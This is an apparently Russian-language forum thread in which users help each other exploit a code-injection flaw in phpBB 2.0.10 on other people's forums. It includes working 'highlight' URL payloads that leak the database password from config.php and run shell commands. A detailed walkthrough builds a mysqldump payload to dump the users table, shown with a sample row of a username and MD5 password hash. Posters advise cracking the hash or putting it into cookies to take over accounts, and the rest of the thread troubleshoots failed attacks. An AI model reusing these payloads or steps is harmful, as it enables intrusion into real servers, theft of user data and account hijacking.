phpbb 2.0.10 тех вопрос

Наткнулся на один форум, там &highlight=%2527.$poster=$dbpasswd.%2527 - бага канает, выводится пасс для бд, так же и логин, но больше ни одна бага не работает, если ковырнуть на &highlight=%2527.$poster=%60$ls%60.%2527&ls=
id;uname%20-a; - выводится )b#i
и всё ни одна из команд не работает, врятли багу там прикрыли, кто нить с этим сталкивался???

 

если не ошибаюсь %20 - это не тот символ который здесь заменяет пробел...

 

Вот после этого ты должен писать команды которые там frik написал

id;uname%20-a;

 

Вроде бы... там так написано типа... потому что закрывать эту всю муть должны вроде б ы символы %2527, нЭ?

 

Дык ясный день, дело в том что ни одна из команд не работает, типа cd..;pwd;ls -l - думаю понятно что это, в том то и беда, что не работают они, где-то я читал мол значит сервак не под линухом, но каким макаром тогда берётся инфа из config.php с помощью
&highlight=%2527.$poster=$dbpasswd.%2527 ???

 

Ну тогда не знаю, дай линк хоть на тот форум.

 

Скорее всего,выключен register globals.
Попробуй вот так:
p=123&highlight=%2527.$poster=%60ls%09-la%60.%2527
Вместо пробела %09
Дамп базы:
p=123&highlight=%2527.$poster=%60/путь/mysqldump%09-uИмяЮзераБазы%09-pПарольБазы%09ИмяБазы%09префикс_users%09>%09db.sql%60.%2527

ИмяЮзераБазы:$poster=$dbuser
ПарольБазы:$poster=$dbpasswd
ИмяБазы:$poster=$dbname
Префикс:$poster=$table_prefix(обычно phpbb_)

 

X-Seven, а /путь/
чего указывать? Покажи пример...
uИмяЮзераБазы%09- А зачем эта чёрточка в конце?
Вообщем только что проверил - не работает дамп базы.

 

Вот так типа по этой схеме надо делать:
mysqldump --opt -uLOGIN -pPASS DBNAME > dump.sql

LOGIN=dbuser
PASS=dbpasswd
DBNAME=dbname

 

Ты прав, register globals выключен, но беда какая-то получается, ставлю вместо пробела - %09 но эфект тот же, зато весь конфиг.пхп вылажен, странно как-то получается =/
Да и если не трудно, то расскажи про путь к дампу.

 

Насчёт дампа базы.
Mysql-база дампится запросами вида:
mysqldump -u -p dbname > file
После -u должнен идти dbuser,например -uadmin,
после -p dbpasswd,например -ppass,
с dbname,надеюсь,всё ясно.Но т.к. целиком база не нужна,
то нужно ещё указать конкретную её часть,а именно,phpbb_users.
(примечание:название может быть другое,например forum_users,как
узнать префикс,читай выше).
Вместо > лучше писать %3E
file-имя файла,куда должна сдампиться база(теоритически).У меня
phpbb_users просто вывелось на страницу.
ВНИМАНИЕ:В запросе важно указать ПОЛНЫЙ ПУТЬ К МУСКУЛЮ,а точнее,
к файлу mysqldump(путь надо предварительно разведать командами
типа ls или cd).Например,пути могут быть такими:
/usr/local/mysql/bin/mysqldump
/usr/local/bin/mysqldump
/usr/bin/mysqldump

Пример:
Если dbuser=root,dbpasswd=qwerty,dbname=baza,prefix=phpbb_,
mysqldump лежит в /usr/bin/,запрос будет таким:

p=123&highlight=%2527.$poster=%60/usr/bin/mysqldump%09-uroot%09-pqwerty%09baza%09phpbb_users%09%3E%09file.sql%60.%2527


Примечание:вместо всех пробелов надо писать %09,если темы P=123 не
существует,то надо изменить номер,например,на p=321,при копировании
строки запроса в браузер,могут появиться пробелы из-за переноса строки,
их надо удалить.

Если всё прошло удачно,то появится что-то типо этого:
- MySQL dump 8.23 -- -- Host: localhost Database: baze --------------------------------------------------------- -- Server version 3.23.58 -- -- Table structure for table `forum_users`.....

Интерес представляют хэши паролей:
INSERT INTO forum_users VALUES (14,1,'Зелёная','fae0b27c451c728867a567e8c1bb4e53',1097589801,0,1097589801,1097589772,0,0,0.00,1,'russian','D M d, Y g:i a',0,0,0,NULL,1,1,0,1,1,1,1,1,0,1,1,0,'',0,'[email protected]','','','Иркутск','','','','','','','','',NULL);
В данном случае Зелёная-логин,[email protected]мыло,на которое логин регился,
fae0b27c451c728867a567e8c1bb4e53 -MD5-хэш,что бы его сломать,надо юзать прогу
MD5Inside.
Примечание:хэш можно подставить в куки вместо своего.

Enjoy!

 

"We have 63383 registered users

Fatal error: Allowed memory size of 39797528 bytes exhausted (tried to allocate 18352939 bytes) in .../forum/viewtopic.php(1107) : regexp code on line 1
"

Как бороться?

 

Ну вот что у меня появилось за место nickname у чела вылезло
-- MySQL dump 9.10 -- -- Host: localhost Database: pbb -- ------------------------------------------------------ -- Server version 4.0.18 )\b#i

Всё больше никучего нету. Подскажите что я не так сделал?

 

Аналогично у меня было, когда пытался ограничить кол-во выводимых записей параметром -w 'user-level=1'. В чем проблема?

 

У меня аналогичное выскакивало когда я неправильно указал префикс(вместо
стандартного phpbb_users надо было forum_users)
Путь к мускулю указан правильный.
Скорее всего,ты где-то ошибся при вводе данных(если dbuser,dbpasswd,dbname и table_prefix указаны верно,то база должна сдампиться).
Ещё в строчку могли попасться лишние пробелы.